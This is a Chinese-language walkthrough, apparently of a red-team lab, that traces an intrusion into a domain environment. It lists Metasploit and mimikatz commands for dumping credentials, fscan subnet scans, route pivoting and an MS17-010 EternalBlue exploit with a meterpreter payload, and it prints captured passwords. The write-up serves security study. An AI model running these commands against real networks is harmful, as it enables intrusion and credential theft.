文章插图
抓一下密码:
run windows/gather/credentials/windows_autologinhashdump
文章插图
文章插图
拿到 Administrator 的密码 Admin12345 , 同时查询域信息: .NET view /domain , 发现该机器并不在域内.
文章插图
查询网络信息发现是双网卡, 利用 fscan 扫描一下网段: fscan64.exe -h 10.10.20.0/24 > result.txt , 发现网段内存在新的机器 10.10.20.7 , 445 端口是开放的, 疑似存在 MS17-010 漏洞.
文章插图
文章插图
文章插图
添加路由, 扫描一下 MS17-010 .
run get_local_subnetsrun autoroute -s 10.10.20.0/24run autoroute -psearch ms17-010use 3set rhost 10.10.20.7run
文章插图
文章插图
发现的确存在 MS17-010 , 利用
exploit/windows/smb/ms17_010_eternalblue 进行攻击, 成功拿下该机器.
search ms17-010use 0set payload windows/x64/meterpreter/bind_tcpset lport 11111run
文章插图
先查看一下权限, 发现直接就是 system 权限, 也不需要进行提权的操作, 用 mimikatz 抓一下密码, 发现该主机在域环境 redteam.red 内, 并且拿到一组域账户的用户名和密码: saul:[email protected]#45 .
load mimikatzcreds_all
文章插图
用其他的方式继续抓一下密码, 成功拿到一组本地用户的用户名及密码: john:[email protected]#45 .
hashdumprun windows/gather/smart_hashdumprun windows/gather/credentials/windows_autologin
文章插图
域内服务器 Mssql查看网段发现新网段, 继续添加路由.
文章插图
上传一个 fscan , 扫描一下网段, 发现存在一台 Windows Server 2008 R2 机器: 10.10.10.18 , 开放了 1433 端口, 并且获得一组弱口令: sa:sa .
推荐阅读
- 高速|女子打不到车雇电动车上高速:2人轮流骑 又累又热
- 袁泉|袁泉,终于从神坛上 下来了
- Java|Java:2022年招聘Java开发人员指南
- TikTok 乱拳打死老师傅:硅谷大厂还在发论文,它产品已经上线了
- 教师|农村学校招代课教师,招聘内容提到的“待遇从优”,到底有多优?
- 孩子打架家长正确处理
- 膝盖脂肪瘤应该怎么治疗?
- 孕12周双顶径看男女
- 汽车|上海修车店一天收20多辆“中暑”车:爆胎、打火机炸了玻璃
- 二十不惑2|《二十不惑2》:四姐妹职场打拼,传达正向价值观不如《少年派2》